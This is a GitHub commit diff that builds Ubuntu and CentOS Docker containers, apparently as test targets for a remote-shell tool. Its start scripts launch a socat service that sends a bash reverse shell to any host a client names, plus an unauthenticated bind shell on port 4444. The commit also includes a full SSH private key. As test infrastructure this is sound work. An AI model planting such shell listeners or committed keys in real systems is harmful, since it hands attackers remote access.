Working ubuntu and centos builds. Added public/private key for testing.

calebstewart · May 27, 2021 · 636a9ea · 636a9ea
1 parent 0d10728
commit 636a9ea
Show file tree

Hide file tree

Showing 10 changed files with 98 additions and 4 deletions.
diff --git a/centos/Dockerfile b/centos/Dockerfile
@@ -23,4 +23,8 @@ RUN chmod +x /start.sh
 COPY reverse.sh /reverse.sh
 RUN chmod +x /reverse.sh
 
+expose 22
+expose 9999
+expose 4444
+
 ENTRYPOINT ["/start.sh"]
diff --git a/centos/id_rsa.pub b/centos/id_rsa.pub
@@ -1 +1 @@
-
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDWaGA9Eog2cbE1AliE6NTmzoGiYkVwA82p5YoM5okwWodqzhVHEMyA/VZ9ovPmvvPekAs664/TMaR73Xb1fNxkzfGjisxBWqN4oOQnOQ/qoG/H5J00YucCFPjIRefIX5uhbnfU1uQIXlm9BBRu9Or2ZPRvLZvnFoiJ2iFF7xpoUfrHAYnpwvyHDUWhCnaFTsSR2JY6V9d5sK2Wp8WACdJNcwYb48V9vnc2hajNKn9mU2yUki6XVg062mfYFrelpknYZglKiig8qrD5d2K0Kanaxd/41nZ7pW/MompYdjOHKIeb/8HYG0+Ajvd49xfYimRlapPQVu96Wp/r/xUW+Xc+oWEq10dybaf9fE9o0PypZKdz32duJlSq2pH2o6XnAN1RcbkLYxFxBDIWNN2oUIvNrI+/+q1HYZIZQP1gPWsfQo2Q9lMNvfte4P73ZCLnPukh+rQO05DGHdtipT7IXK2VbQscSocSSn1X6hMePx8eTLCKCMDYD1E0MdefhQnZplc= caleb@stewie-ryzen
diff --git a/centos/reverse.sh b/centos/reverse.sh
@@ -4,5 +4,5 @@
 read -r TARGET
 # Close stdio
 exec <&- >&- 2>&-
-# Connect a shell
-socat exec:/bin/bash,stderr tcp:$TARGET,connect-timeout=3
+# Connect a shell (we use exec because we don't need this bash anymore)
+exec socat exec:/bin/bash,stderr tcp:$TARGET,connect-timeout=3
diff --git a/centos/start.sh b/centos/start.sh
@@ -1,7 +1,10 @@
 #!/bin/sh
 
+# Start the SSH server
 /usr/sbin/sshd &
 
+# Start a service which can trigger reverse shells
 socat tcp-l:9999,fork,setsid,reuseaddr EXEC:/reverse.sh &
 
+# Start an infinite bind shell
 sudo -u caleb socat TCP-LISTEN:4444,reuseaddr,fork,setsid EXEC:/bin/bash
diff --git a/id_rsa b/id_rsa
@@ -0,0 +1,38 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+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
+-----END OPENSSH PRIVATE KEY-----
diff --git a/id_rsa.pub b/id_rsa.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDWaGA9Eog2cbE1AliE6NTmzoGiYkVwA82p5YoM5okwWodqzhVHEMyA/VZ9ovPmvvPekAs664/TMaR73Xb1fNxkzfGjisxBWqN4oOQnOQ/qoG/H5J00YucCFPjIRefIX5uhbnfU1uQIXlm9BBRu9Or2ZPRvLZvnFoiJ2iFF7xpoUfrHAYnpwvyHDUWhCnaFTsSR2JY6V9d5sK2Wp8WACdJNcwYb48V9vnc2hajNKn9mU2yUki6XVg062mfYFrelpknYZglKiig8qrD5d2K0Kanaxd/41nZ7pW/MompYdjOHKIeb/8HYG0+Ajvd49xfYimRlapPQVu96Wp/r/xUW+Xc+oWEq10dybaf9fE9o0PypZKdz32duJlSq2pH2o6XnAN1RcbkLYxFxBDIWNN2oUIvNrI+/+q1HYZIZQP1gPWsfQo2Q9lMNvfte4P73ZCLnPukh+rQO05DGHdtipT7IXK2VbQscSocSSn1X6hMePx8eTLCKCMDYD1E0MdefhQnZplc= caleb@stewie-ryzen
diff --git a/ubuntu/Dockerfile b/ubuntu/Dockerfile
@@ -1 +1,30 @@
-FROM ubuntu:20.04
+FROM ubuntu:latest
+
+RUN apt-get update -y && apt-get -y install socat openssh-server sudo
+
+# Create "privilege separation directory"
+RUN mkdir -p /run/sshd
+
+# Create users
+RUN useradd -m -U caleb
+RUN useradd -m -U john
+
+# Setup user SSH directories
+RUN mkdir -p /home/caleb/.ssh /home/john/.ssh
+COPY id_rsa.pub /home/caleb/.ssh/authorized_keys
+RUN chown -R caleb:caleb /home/caleb && chown -R john:john /home/john
+RUN chmod 600 /home/caleb/.ssh/authorized_keys
+
+# Copy the startup script
+COPY start.sh /start.sh
+RUN chmod +x /start.sh
+
+# Copy reverse shell script
+COPY reverse.sh /reverse.sh
+RUN chmod +x /reverse.sh
+
+expose 22
+expose 9999
+expose 4444
+
+ENTRYPOINT ["/start.sh"]
diff --git a/ubuntu/id_rsa.pub b/ubuntu/id_rsa.pub
@@ -0,0 +1 @@
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDWaGA9Eog2cbE1AliE6NTmzoGiYkVwA82p5YoM5okwWodqzhVHEMyA/VZ9ovPmvvPekAs664/TMaR73Xb1fNxkzfGjisxBWqN4oOQnOQ/qoG/H5J00YucCFPjIRefIX5uhbnfU1uQIXlm9BBRu9Or2ZPRvLZvnFoiJ2iFF7xpoUfrHAYnpwvyHDUWhCnaFTsSR2JY6V9d5sK2Wp8WACdJNcwYb48V9vnc2hajNKn9mU2yUki6XVg062mfYFrelpknYZglKiig8qrD5d2K0Kanaxd/41nZ7pW/MompYdjOHKIeb/8HYG0+Ajvd49xfYimRlapPQVu96Wp/r/xUW+Xc+oWEq10dybaf9fE9o0PypZKdz32duJlSq2pH2o6XnAN1RcbkLYxFxBDIWNN2oUIvNrI+/+q1HYZIZQP1gPWsfQo2Q9lMNvfte4P73ZCLnPukh+rQO05DGHdtipT7IXK2VbQscSocSSn1X6hMePx8eTLCKCMDYD1E0MdefhQnZplc= caleb@stewie-ryzen
diff --git a/ubuntu/reverse.sh b/ubuntu/reverse.sh
@@ -0,0 +1,8 @@
+#!/bin/sh
+
+# Read the target host:port
+read -r TARGET
+# Close stdio
+exec <&- >&- 2>&-
+# Connect a shell (we use exec because we don't need this bash anymore)
+exec socat exec:/bin/bash,stderr tcp:$TARGET,connect-timeout=3
diff --git a/ubuntu/start.sh b/ubuntu/start.sh
@@ -0,0 +1,10 @@
+#!/bin/sh
+
+# Start the SSH server
+/usr/sbin/sshd &
+
+# Start a service which can trigger reverse shells
+socat tcp-l:9999,fork,setsid,reuseaddr EXEC:/reverse.sh &
+
+# Start an infinite bind shell
+sudo -u caleb socat TCP-LISTEN:4444,reuseaddr,fork,setsid EXEC:/bin/bash